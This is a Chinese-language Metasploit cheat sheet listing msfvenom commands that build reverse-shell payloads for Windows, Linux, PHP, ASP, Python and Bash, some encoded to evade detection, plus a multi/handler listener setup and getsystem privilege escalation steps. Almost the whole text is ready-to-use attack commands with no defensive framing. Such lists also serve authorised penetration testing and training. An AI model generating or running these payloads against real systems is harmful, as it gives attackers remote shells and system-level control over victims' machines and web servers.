1、生成反彈木馬(腳本,執行程序)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -o shell.exe
2、MSF接受設置
1 use exploit/multi/handler 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.1.111 4 Exploit
3、采用自動化提權,調用其他EXP進行提權
Getuid 查看當前權限
Getsystem 自動化提升
4、MSF Payloads
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe 2 msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php 3 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp 4 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
MSF 生成在 Linux 下反彈的 Meterpreter Shell
1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反彈 Shell (C Shellcode)
1 msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
MSF 生成反彈 Python Shell
1 msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反彈 ASP Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
MSF 生成反彈 Bash Shell
1 msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
MSF 生成反彈 PHP Shell
1 msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php 2 add <?php at the beginning 3 perl -i~ -0777pe's/^/<?php \n/' shell.php
MSF 生成反彈 Win Shell
1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe